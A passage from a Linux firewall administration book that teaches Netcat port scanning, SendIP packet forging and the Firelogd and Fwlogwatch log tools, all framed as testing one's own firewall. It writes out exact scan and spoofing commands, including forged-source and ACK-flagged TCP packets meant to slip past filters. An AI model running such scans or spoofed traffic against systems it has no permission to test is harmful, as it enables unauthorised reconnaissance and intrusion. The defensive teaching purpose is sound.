53,in +case a domain zone transfer needs to be made.To test whether this port is open, +you would issue the following commands: +./nc -p 53 –w 2 –v –v firewall.yournetwork.com 53 +./nc –u -p 53 –w 2 –v –v firewall.yournetwork.com 53 +You can also scan a range of ports using Netcat.If,for example,you wished +to scan ports 1 through 1023,you would issue the following command: +./nc firewall firewall.yournetwork.com 1-1023 +Exercise: Using Netcat +1. Create a new directory named netcat and change into it.This step is +necessary,because the tarball will deposit many different files into the +destination directory. +2. Obtain Netcat version 1.10 from the CD that accompanies this book +(the file name is nc110.tgz),or from http://packetstorm.securify.com. +Just enter netcat in the search field.When you save the tarball,save it to +the netcat directory. +3. Once you have obtained Netcat and saved it to the netcat directory, +untar and unzip it: +tar –zxvf nc110.tgz +4. Most versions of Linux do well with the following compile option: +make generic +However,you may want to read the file named Makefile and see if +your operating system is specifically listed. +5. Once you have compiled Netcat,the nc binary will be created in the +present directory.Copy it to the /bin/ directory.Or,if you prefer,you +can just leave it in the present directory and use ./ in front of the com- +mand while it is in the same directory.Now that Netcat is ready to be +used,create several firewall rules that log port scans. +6. Open a terminal on your firewall and view the /var/log/messages file: +tail –f /var/log/messages +www.syngress.com + +138_linux_11 6/20/01 9:52 AM Page 558 +558 Chapter 11 • Maintaining Firewalls +7. Now,conduct a sample portscan against your firewall: +./nc–w 2 –v –v firewall 1-1023 +You can now use Netcat to conduct tests against your firewall. +SendIP: The Packet Forger +Although Netcat does have the ability to create some packets in certain instances, +it is not a true packet generator.SendIP is designed to allow you to create packets +of your own choosing.This practice is often called “arbitrary packet generation.” +SendIP allows you to create your own IP,Internet Control Message Protocol +(ICMP),TCP,and UDP packets.For example,you can generate TCP packets +with the FIN,ACK,and SYN bits set according to your testing needs.You can +obtain SendIP from several sites,including www.earth.li/projectpurple/progs/ +sendip.html and http://packetstorm.securify.com.RPM and tarball files for ver- +sion 1.5 can be found on the accompanying CD (sendip-1.5-1.i386.rpm and +sendip-1.5.tar.gz). +SendIP Syntax +Although there are many options,SendIP syntax is relatively straightforward: +sendip [hostname] -p -d +SendIP Options +The -p option specifies the protocol you wish to generate,and the -d option +allows you to enter a random text string.The options,many of which are listed +in Table 11.2,allow you to customize the contents of the packets you generate. +Table 11.2 SendIP Options +Option Description +-p value The option that determines which type of packet SendIP will +create. Values include ip, icmp, tcp, and udp. +-is Specifies a source IP address of your own choosing. By default, +the “true” IP address of the local host is used. +-id Specifies the destination IP address for the packet you are +generating. +Continued +www.syngress.com + +138_linux_11 6/20/01 9:52 AM Page 559 +Maintaining Firewalls • Chapter 11 559 +Table 11.2 Continued +Option Description +-ih For customizing the length of the IP header. +-iy Sets the Type of Service (ToS) field for the packet. Consult the +previous chapter for values that you can enter. The default value +is to leave all fields blank. +-il Sets the length of the packet. +-it Sets the time-to-live (TTL) for the packet you generate. The +default value is 255 bytes. +-ip Tells SendIP to create an IP packet. +-ct value For generating ICMP packet types. The default is echo-request (8), +but you can specify any other type by entering -ct 03, for +example. See the previous chapter or RFC 950. +-us Specifies the source port for UDP packets. The default is the +random port assigned to the packet when it is sent out. +-ud The destination port of a UDP packet. You must specify a +destination port. +-ts Specifies the source port of a TCP packet. The default is the +random port assigned to the packet when it is sent out. +-td Sets the destination port for the TCP packet. You must specify a +destination port. +-tn Allows you to specify the TCP sequence number. By default, the +number will be random. +-tfa Sets the ACK bit on a TCP packet. By default, the value is not set, +unless you use the -ta option along with -tfa. This is because an +ACK packet is used to finish the process of tearing down a +connection. +-ta Allows you to request an acknowledgment packet, which is used +to acknowledge that the TCP connection is ready to end. +-tfr Creates a RESET packet. +-tfs Alters the packet so that the SYN bit is set. +-tu Creates a packet with the URGENT pointer set. This pointer begins +the process of prioritizing traffic. +-tfu Sets the URGENT bit in a TCP packet. The default is 0 unless you +use the -tu option along with -tfu. For more information, consult +RFC 1122. +Continued +www.syngress.com + +138_linux_11 6/20/01 9:52 AM Page 560 +560 Chapter 11 • Maintaining Firewalls +Table 11.2 Continued +Option Description +-tff Sets the FIN bit. +-r Randomizes all options. For example, if you specify IP as the +protocol, the -r option automatically creates a random sending IP +address. +The SendIP man page contains additional options.As you can see,SendIP +allows you to forge any part of a TCP session,as well as any element of an IP,UDP, +or ICMP packet.SendIP also allows you to forge all elements of IPv6 addresses, +and also allows you to forge Routing Information Protocol (RIP) packets. +This tool is useful in regard to firewalls because it allows you to simulate any +situation.The ipchains -C command has similar functionality.However,you can +install SendIP anywhere,whereas many newer kernels do not support Ipchains. +Besides,using SendIP,you can spend your time learning only one application. +SECURITY ALERT! +Applications such as SendIP and Netcat are often used in the hacker +community. Take care that you do not allow all users on your network to +access such applications. In fact, even using Telnet in the way shown pre- +viously is not recommended unless you own the systems you are scan- +ning, or you have explicit permission from the operator of the system +you are going to scan. Educate your IT personnel that they should use +this software very carefully, and that they should never assume that they +are allowed to scan or otherwise issue packets to a system that is not +their responsibility. +To guard against illicit use of such applications, consider placing a +note in your security policy to the effect that only certain users are +allowed to access scanning and IP spoofing software for security +auditing purposes. +Exercise: Using SendIP to Probe a Firewall +1. The source files do not differ from the RPM.Download SendIP +RPM from http://www.earth.li/projectpurple/progs/sendip.html or +packetstorm.securify.com. +www.syngress.com + +138_linux_11 6/20/01 9:52 AM Page 561 +Maintaining Firewalls • Chapter 11 561 +2. As root,type the following: +rpm -ivh sendip-1.5-1.i386.rpm +3. Now that you have installed SendIP on this system,it will be known as +the “attacking host.”You are now going to use SendIP on this attacking +host to check your firewall’s ability to block spoofed packets coming in +from the outside interface.If necessary,review Chapter 9 to learn how +to create anti-spoofing rules for your firewall.To check your firewall’s +configuration,set up a machine outside of your firewall,and then give +your firewall’s IP address as the default gateway. +4. Suppose that you have only the internal networks of 192.168.2.0/24 and +10.100.100.0/24,and a simple Linux client using the IP address of +192.168.2.37.You wish to test your firewall to see if spoofed traffic from +outside the network can get through your firewall to your Linux client. +To test this,configure a system on your internal network (say,with the +IP address of 192.168.2.37) to use a packet sniffer such as Tcpdump or +Ethereal to view all packets on the 192.168.2.0 network.This will be the +internal host.If necessary,review Chapter 5 to learn more about packet +sniffers. +5. Put the NIC of the internal host into promiscuous mode so that it can +capture the spoofed packet you are about to send.Hopefully,the spoofed +packet won’t get through. +6. Issue the following command from the attacking host to the internal +host: +sendip 192.168.2.37 -p icmp -is 192.168.2.36 +7. You have just issued a spoofing attack against your firewall and internal +network.Now,stop your capture of packets on your internal host.Were +you able to see an echo request from 192.168.2.36? Did the +192.168.2.37 system issue an echo reply? Did you see any DNS traffic +that appears to be an attempt to resolve the 192.168.2.37 IP address? If +you did,then review your spoofing rules.If you did not,chances are that +you have properly configured anti-spoofing on your firewall. +Remember,if you are on a switched network,you will have to con- +figure a packet sniffer on the victim host,and then ping that victim host +directly.This is because a switched network does not use broadcasting as +does a standard hub-based network. +www.syngress.com + +138_linux_11 6/20/01 9:52 AM Page 562 +562 Chapter 11 • Maintaining Firewalls +8. If you have enabled logging for such packets,use the tail -f command +on your firewall to see if the kernel records capturing the packet. +9. Now,try spoofing with another protocol: +sendip 192.168.2.37 -p tcp -ts 2 -td 80 -tn -is 192.168.2.36 +This command sends a tcp packet with the source port of 2 to the +192.168.2.37 host at port 80.Your firewall should block this packet, +because it should not allow packets to privileged ports (ports below +1023) to go into the internal network. +10. When you are reasonably sure that your firewall is blocking spoofed +packets,issue the following command from your attacking host: +sendip 192.168.2.37 -p tcp -ts 2 -td 80 -tn -is 45.2.5.6 +11. This command does much the same thing,but instead,it creates a packet +that has a stronger chance of passing through your firewall.Why? Because +this packet apparently originates from the 45.2.5.6 host,which is an IP +address that could plausibly originate from the Internet.In addition,at +least for the purposes of this exercise,this address does not exist inside +your network.However,this packet should not be passed through,either, +because it originates from a privileged port and is directed at a privileged +port (80) on the destination.Finally,issue the following command: +sendip 192.168.2.37 -p tcp -ta 1 -ts 4356 -td 6450 -tn -is +45.2.5.6 +12. Depending on your firewall configuration,this packet may be allowed to +pass through.This is because the ACK bit has been set using the -ta +option.As a result,the firewall rules may allow it through because it is +part of an already-established session.In addition,notice that the source +and destination ports are ephemeral,and not well known (below 1023). +Consider using additional commands to further test your firewall.Make +the necessary changes,without affecting the services that you wish to +provide. +www.syngress.com + +138_linux_11 6/20/01 9:52 AM Page 563 +Maintaining Firewalls • Chapter 11 563 +Understanding Firewall Logging, +Blocking, and Alert Options +You have already seen how you can check the kernel messages for log entries +using the tail -f /var/log/messages command.However,more elegant ways to +capture and view firewall logs exist.Third-party logging applications such as +Firewall Log Daemon (Firelogd) and FwLogwatch are available to help you sort +and act on the information gathered by the firewall. +Firewall Log Daemon +Firelogd (Firewall Log Daemon) is a relatively simple program that can either be +run as an application or (you might have guessed) as a daemon.It does two +things: +(cid:2) It reads the kernel log entries and passes them into a “first in,first out” +(FIFO) pipe,which Firelogd can then process. +(cid:2) Once its buffer is full,it e-mails a report of suspicious traffic to an +account of your choosing.You can have it mailed to a local account,or +to a remote system of your choice. +The application supports both Ipchains and Iptables.Older versions required +you to edit the dmn.h file,and then use the make command to compile the +application.Now,however,Firelogd supports command-line arguments.You have +various options,which are listed in the following sections. +Obtaining Firelogd +You can obtain Firelogd from the CD that accompanies this book.The RPM +package is named firelogd-1.3-5.i386.rpm,and it has an accompanying MD5 +signature (firelogdmd5sums.txt).You can download more recent versions from +www.speakeasy.org/~roux/dmn/ or from http://packetstorm.securify.com.The +RPM file is best for Red Hat systems.As of this writing,the tarball format does +not have any special features. +Syntax and Configuration Options +The syntax for using Firelogd is as follows: +/usr/sbin/firelogd [-dmskh] [-b buffersize] [-e email] [-l log] +[-t template] [-] +www.syngress.com + +138_linux_11 6/20/01 9:52 AM Page 564 +564 Chapter 11 • Maintaining Firewalls +If you install Firelogd using the available RPM,you can also start Firelogd by +using its startup script (/etc/rc.d/init.d/firelogd).You will have to edit this script +to customize it if you wish to change or add any of the options. +Commonly Used Options +Following is a list of the most often-used options. +(cid:2) Daemon mode If used without any options at all,Fwlogwatch runs as +a simple application.The -d option has firelogd “fork off”and run as a +daemon. +(cid:2) E-mail destination The person who receives the e-mail messages. +You can specify this either by using the -e option,or by editing the +/etc/rc.d/init.d/firelogd script that comes with the RPM. +(cid:2) Log file The location of the log file that Firelogd reads from.On Red +Hat Linux,for example,this is usually /var/log/messages.You can specify +a log file by either using the -l option,or by modifying the /etc/rc.d/ +init.d/firelogd script. +(cid:2) Buffer size Tells Firelogd to wait for x number of entries before +mailing them.The default is 10,which means a single e-mail will con- +tain 10 entries.A value of 100 may be a more reasonable number.Using +the default,you will receive dozens of e-mails in the case of a simple +Nmap scanning attack.Experiment with these settings.If 100 gives you +too little information about the nature of traffic at your firewall,then +decrease the setting. +(cid:2) Template Firelogd allows you to customize the alert messages.You can +have Firelogd send you a great deal of information,or you can configure +it to be as sparse as possible.The /etc/firelog.conf file contains the +default template. +You can learn more about the additional options by consulting the firelogd +man page. +Message Format +The e-mail message you receive will include multiple packet hits giving you the +following information: +1. The date and time of the rejected or logged packet. +2. The name of the chain responsible for dropping or logging the packet. +www.syngress.com + +138_linux_11 6/20/01 9:52 AM Page 565 +Maintaining Firewalls • Chapter 11 565 +3. The input interface. +4. The packet’s TTL. +5. The IP of the firewall host and the number of the port to which the +packet was sent (i.e.,the destination port). +6. The origin of the IP address.Remember,it is possible to spoof IP +addresses. +Here is an example of a default Firelogd log entry: +01:28:37/May-5 ****S* TCP *D* REJECT/input-9 eth0 ***|***** ttl:64 +badguy.hackerz.com -> hems(151) +128.37.08.43:4218 -> firewall.goodguys.com:151 +Output Example +Here is output from a more extended example: +prompt# /usr/sbin/firelogd +LOG ENTRY: +April 5 09:53:37 firewall kernel: Packet log: input REJECT eth0 PROTO=6 +45.128.2.3:2748 128.1.2.3.4:3049 L=60 S=0x00 I=0 F=0x4000 T=64 SYN +(#9) +CONTEXT INFORMATION: +Time: April 5 09:53:37 +Msg: REJECT/input-9 +In: eth0 +Out: +Mac: +IP DATAGRAM INFORMATION: +Source: 45.128.2.3 badguy.badguy.com +Dest.: 128.1.2.3.4 firewall.goodguys.com +IPlen: 60 +TOS: TOS-0x00, PREC-0x00 -> ***|***** +TTL: 64 +FRAG: 0x4000 -> *D* +www.syngress.com + +138_linux_11 6/20/01 9:52 AM Page 566 +566 Chapter 11 • Maintaining Firewalls +ICMP SPECIFIC DATA: +Type: +Code: +Info: +Triggering Packet: +TCP SPECIFIC DATA: +Window: +Reserved Bits: +Flags: SYN -> ****S* +UDP SPECIFIC DATA: +UDP Datagram length: +TCP/UDP SERVICE PORTS: +Source Port: 2748(fjippol-polsvr) -> 3049(nsws) +In the preceding output,the attacking host’s IP address is 45.128.2.3,and the +firewall’s IP address is 128.1.2.3.4.In this particular example,ICMP logging is +not activated on the kernel.However,you can gather information about the +nature of the attack by viewing the logs.This is an example of a simple,full +TCP scan. +Customizing Messages +You can customize Firelogd messages by editing the /etc/firelogd.conf file and +changing the values to suit your own situation.The default file comes with sev- +eral suggested templates,which are commented out by using the following two +words: +startcomment +endcomment +Firelogd will not read anything within these lines.Firelogd contains three +entries.The first,discussed previously,is moderately verbose.The second is +described as a “one-liner,”and gives information about the time of the scan,as +well as the source and destination IP addresses and ports.The final option is quite +verbose,informing you about the details of the connection.You can,of course, +www.syngress.com + +138_linux_11 6/20/01 9:52 AM Page 567 +Maintaining Firewalls • Chapter 11 567 +create your own entry using the syntax described in the /etc/firelogd file.For +example,the following sample code records the source IP address and the desti- +nation port address,as well as the interface where the traffic occurred.The text +“From the firewall at the company”acts as a header for the information. +tab From the firewall at the company. nl +tab srcip sp r_dstpt sp in sp +The tab,space,and nl entries create tabs,single space,and new lines,respec- +tively.The char srcip field has Firelogd inform you of the source IP address of the +packet.The r_dspt field provides the destination port for the packet.Finally,the +char in field has Firelogd report the interface.You can,of course,specify your +own text and other options.The /etc/firelog.conf file shows you all of the +options.Figure 11.2 shows an example of the configuration file. +Figure 11.2 The /etc/firelog.conf File +www.syngress.com + +138_linux_11 6/20/01 9:52 AM Page 568 +568 Chapter 11 • Maintaining Firewalls +NOTE +Firelogd simply parses the log files generated by either Ipchains or +Iptables. It does not generate the log files themselves. Therefore, you +must have logging enabled through Iptables or Ipchains in order for +Firelogd to operate properly. +Reading Log Files Generated by Other Firewalls +You can read log files generated by other systems,as well.For example,if you +downloaded the /var/log/messages file from a remote system,you can read it +with the following command: +cat messages | firelogd - +The hyphen allows the application to read the command directly from +standard input. +Exercise: Configuring and Compiling Firelogd +1. Obtain Firelogd from www.speakeasy.org/~roux/dmn/ or from +packetstorm.securify.com.The RPM file is best for Red Hat systems. +The tarball does not provide any special configuration options. +2. Install the RPM.Once you install the RPM,the Firelogd will automati- +cally begin running.Stop Firelogd by issuing the following command: +/etc/rc.d/init.d/firelogd stop +3. Issue the following command: +/usr/sbin/firelogd +4. Use a port scanner such as Gnome Service Scan or Nmap to scan your +firewall.Remember that the firewall must have logging enabled at the +interface you are scanning. +5. You should see output on your screen.You will not receive any e-mail +message,because you have not supplied any arguments. +6. Stop Firelogd by pressing CTRL+C. +www.syngress.com + +138_linux_11 6/20/01 9:52 AM Page 569 +Maintaining Firewalls • Chapter 11 569 +7. Now,prepare firelogd to run as a daemon.Make a copy of the /etc/ +rc.d/init.d/firelogd initialization script file and name it firelogd.bak.Edit +the original so that the entries are as follows: +QSIZE=30 +# Who is the administrator +MAIL=your_address@yourcompany.com +# Where is the output template +You may have to adjust the QSIZE settings to fit your own situation. +8. Make a copy of the /etc/firelogd.conf in case anything goes wrong,and +then edit the original file so that verbose logging is enabled.To do this, +first comment out the default log entries,which are immediately below +the text that reads “I like the look of the one below.”Use the startcom- +ment and endcomment keywords.Then,uncomment the entry that begins +with the text that reads “This one is very verbose,”and save the file. +9. Start Firelogd: +/etc/rc.d/init.d/firelogd start +10. Use Gnome ServiceScan or Nmap to conduct an attack that scans +multiple ports of your firewall. +11. View the message using your e-mail client. +12. Re-edit the /etc/firelogd file and comment out the verbose entries and +uncomment the entries that are beneath the text that reads “This one is +a one-liner.”This entry will send terse messages.If you wish,set the +QSIZE value to 100,which means that each e-mail Firelogd sends will +have 100 entries in it.It also means that Firelogd will not send you alerts +as often;the larger the buffer value,the longer it will take to receive a +message.Consequently,Firelogd will be less responsive to attacks,and +will not inform you as often.However,one longer message is likely +easier to read than several shorter messages. +Fwlogwatch +Fwlogwatch,written by Boris Wesslowski,is a logging and reporting mechanism that +also allows you to automatically block all traffic that is identified as an attack.Used +in conjunction with Firelogd,it helps create a system that continuously keeps you +informed concerning port scans and other network events that surpass the +www.syngress.com + +138_linux_11 6/20/01 9:52 AM Page 570 +570 Chapter 11 • Maintaining Firewalls +thresholds you set.Fwlogwatch is available at the CERT-RUS Web site (http://cert +.uni-stuttgart.de/projects/fwlogwatch) and Wesslowski’s personal Web site +(www.kyb.uni-stuttgart.de/boris/software.shtml).It is available in both tarball and +RPM format,and there is no significant difference between the two.The accompa- +nying CD contains both the tarball and RPM versions (fwlogwatch-0.3-bin.tar.gz +and fwlogwatch-0.3-1.i386.rpm).Although FwLogwatch is similar to Firelogd,it is +far more versatile.You can configure Fwlogwatch to do the following: +(cid:2) Parse the firewall log file and generate user-friendly HTML reports, +which you can read with any Web browser.Fwlogwatch can read log +files from any Ipchains or Iptables-enabled system,as well as Cisco fire- +walls and routers. +(cid:2) E-mail an alert to you when suspicious activity occurs (e.g.,when +numerous connection attempts—usually port scans—surpass the +threshold you set in /etc/firelogwatch.config,the Fwlogwatch configu- +ration file).As with Fwlogwatch,this option will work only on packets +that you decide to log. +(cid:2) Issue a Windows Messenger Service alert that creates a “pop up”message +to a Windows NT or 2000 server of your choice. +(cid:2) Deliver summary-based e-mail messages informing management of the +scans that have occurred. +(cid:2) Insert Ipchains or Iptables-based rules that block hosts from connecting +to your firewall and/or internal network hosts. +(cid:2) Execute custom-created commands.You can have Fwlogwatch run any +script that you wish to create. +Fwlogwatch Modes +Fwlogwatch operates in one of three modes.Table 11.3 describes each. +Table 11.3 Fwlogwatch Modes +Mode Description +Realtime Fwlogwatch operates as a daemon and reads the kernel +messages file (usually /var/log/messages), waiting for +Ipchains/Iptables-generated packets to occur. When the packets +surpass the threshold, Fwlogwatch generates an alert. This +mode is generally not for generating reports. Several Common +Continued +www.syngress.com + +138_linux_11 6/20/01 9:52 AM Page 571 +Maintaining Firewalls • Chapter 11 571 +Table 11.3 Continued +Mode Description +Gateway Interface (CGI) scripts are available to help you +generate HTML reports. +Interactive Allows you to have Fwlogwatch read the /var/log/messages file +and issue e-mail messages to various destinations. To use this +mode, you must uncomment various lines, such as at least one +e-mail account, in fwlogwatch.conf (or whatever name you are +using). The e-mail messages are formatted according to the +information found in the /etc/fwlogwatch.template file. When +you start Fwlogwatch in interactive mode, it will parse the +/var/log/messages file and then ask you if you wish to send an +e-mail message to your recipient. +Log Time Has Fwlogwatch inform you concerning the total number of +entries in the /var/log/messages file. It also includes the first +and last entries the kernel makes. +You can also manually generate HTML reports.Figure 11.3 shows the Help +menu,which shows all of the command options.You can generate this list by +entering fwlogwatch -h. +Figure 11.3 Fwlogwatch Command Options +www.syngress.com + +138_linux_11 6/20/01 9:52 AM Page 572 +572 Chapter 11 • Maintaining Firewalls +You can also consult the fwlogwatch man page for additional details.This +chapter will focus on generating reports and configuring Fwlogwatch to send +real-time alerts. +Fwlogwatch Options and Generating Reports +Table 11.4 is a list of the more relevant options,if you choose not to use the +/etc/fwlogwatch.config file. +Table 11.4 FwLogwatch Options +Option Description +-c Allows you to specify your own configuration file. The default is +/etc/fwlogwatch.config. If you leave this filename at its default, +you will not be able to manually use Fwlogwatch or use CGI +scripts to generate automatic reports. +-f Allows you to read a different kernel log file, rather than the +default of /var/log/messages. +-L Has Fwlogwatch give the time of the first and last log entry. +-l